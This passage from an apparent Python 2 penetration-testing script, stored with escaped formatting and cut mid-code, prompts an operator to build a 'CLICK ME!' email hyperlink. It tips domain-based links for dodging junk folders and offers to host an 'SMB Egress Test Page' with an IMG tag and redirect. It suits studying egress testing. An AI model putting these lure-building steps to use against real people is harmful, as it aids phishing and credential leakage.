yes:'''\n\n\tif hyperLinkOption is True:\n\t\tprint('TIP: Domain based HyperLinks help avoid the \"JunkFolder\".')\n\t\thyperAddress = raw_input('Please enter a addresss without \"http://\": ['+extipAddress+']:' ) or extipAddress\n\t\tprint(\"ENTERED: \" \"%s\" % \"http://\"+hyperAddress+\"/\" + \"\\n\")\n\t\thyperText = raw_input('Enter text for Hyperlink to be displayed[CLICK ME!]: ') or 'CLICK ME!'\n\t\tprint(\"ENTERED: \" \"%s\" % hyperText + \"\\n\")\n\t\thyperLink = ''+hyperText+'' \n\t\t#HTTP Server OPTIONS\n\t\tprint('TIP: You can point your HyperLink to a locally hosted Webpage.')\n\t\t\n\n\t\t#use yes_no function instead of inline\n\t\t#httpServOption = raw_input(\"Host local Webpage with an HTML IMG Tag?[yes]: \") or 'yes'\n\t\t\n\t\thttpServOption = yes_no('Host local Webpage with an HTML IMG Tag? (y/n)? ')\n\t\t'''print('ENTERED:' \"%s\" % httpServOption + \"\\n\")\n\t\tchoice = httpServOption.lower()\n\t\tyes = set(['yes','y', 'ye', ''])\n\t\tno = set(['no','n'])\n\t\tif choice in yes:'''\n\t\tif httpServOption is True:\n\t\t\thttpPort = raw_input(\"HTTP Server Port?:[80]\") or 80\n\t\t\tprint('ENTERED:' \"%s\" % httpPort + \"\\n\")\n\t\t\tprint(\"\\n\")\n\t\t\tprint(\"TIP: Coming soon...\")\n\t\t\t#Redirect OPTIONS\n\t\t\t\n\t\t\t#use yes_no function instead of inline\n\t\t\t#redirectOption = raw_input(\"Would you like a redirect on your Webpage?[yes]:\") or 'yes'\n\t\t\tredirectOption = yes_no('Would you like a redirect on your Webpage? (y/n): ')\n\n\t\t\t'''print('ENTERED:' \"%s\" % redirectOption + \"\\n\")\n\t\t\tchoice = redirectOption.lower()\n\t\t\tyes = set(['yes','y', 'ye', ''])\n\t\t\tno = set(['no','n'])\n\t\t\tif choice in yes:'''\n\n\t\t\tif redirectOption is True:\n\t\t\t\tredirect = raw_input('Enter redirect address[ex: client-site.com]:') or ''\n\t\t\t\tprint('ENTERED:' \"%s\" % redirect + \"\\n\")\n\t\t\telse:\n\t\t\t\tprint('Okay, Webpage will not redirect:')\n\t\t\t\tredirect = ''\n\t\t\t'''else:\n\t\t\t\tsys.stdout.write(\"Please respond with 'yes' or 'no'\")'''\n\n\t\t### EDIT: HTML Template Below ###\n\t\t### Becareful not to remove the variables {0} and {1} ###\n\t\t\thtml = \"\"\"\n\t\t\t\n\t\t\t\n\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\tSMB Egress Test Page.\n\t\t\t\n\t\t\t
\n\t\t\t
\n\t\t\t\n\t\t\t